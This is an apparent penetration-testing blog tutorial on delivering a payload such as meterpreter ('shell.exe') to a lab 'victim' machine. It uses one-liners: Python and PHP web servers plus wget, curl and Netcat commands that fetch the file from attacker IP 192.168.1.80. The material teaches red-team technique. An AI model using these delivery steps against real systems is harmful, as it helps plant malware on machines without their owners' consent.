One-Liners Payload Delievery with Kali & Parrot-Sec OS's

Previously we discussed some of the ways through which we can transfer an advanced payload like meterpreter to the victim's machine during penetration testing and red teaming. Today we will see how quickly we can transfer these advanced payloads using some one-liners.

Tools used:
Kali OS
Python 2.7 | 3.7
PHP
Netcat

We can create a python HTTP server that can deploy our payload very easily.

root@Pentest-Pundit:~/shells # python -m SimpleHTTPServer 80
or in python3 will use http.server module
root@Pentest-Pundit:~/shells # python3 -m http.server 80

On the client shell, we can use any command-line web-crawler or fetchers like Wget or curlWe boot-up another kali machine having the username kali as a victim machine. On this machine (victim) we have to give the following command to transfer the file.
kali@victim:~$ wget http://192.168.1.80/shell.exe
or
kali@victim:~$curl http://192.168.1.80/shell.exe --output shell.exe

Here we can see a request in our Python Simplehttpserver from our victim PC.


Netcat:
Another way to transfer a file quickly is to use Netcat as a file transfer tool. This will help if the victim already has Netcat installed. 
We will start a Netcat listener on our attacking Kali machine (Pentest-Pundit) with the shell (file) to transfer, redirected with < to our Netcat listener as shown below.
root@Pentest-Pundit:~/shells # nc -nlvp 80 < shell.exe

We boot-up another kali machine having the username kali as a victim machine. On this machine (victim) we have to give the following command to transfer the file.
kali@victim:~$ nc -nv 192.168.1.80 80 > shell.exe
(UNKNOWN) [192.168.1.80] 80 (http) open

^C

We can confirm the file size on the server-side and client side by ls command.


PHP built-in Web Server:
We can also use PHP built-in Web server to do this task in one line.
root@Pentest-Pundit:~/shells # php -S 192.168.1.80:80 -t /root/shells/
PHP 7.3.12-1 Development Server started on Tue May 5 01:09:14 2020
Listening on http://192.168.1.80:80
Document root is /root/shells
Press Ctrl-C to quit.

On the victim's command shell, we will transfer the shell using get or curl, that we already used.
kali@victim:~$ wget http://192.168.1.80/shell.exe

After transfer happens, we can see a request at the PHP built-in web server.

By
Labels: , , , , , , , , , , , , , ,

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)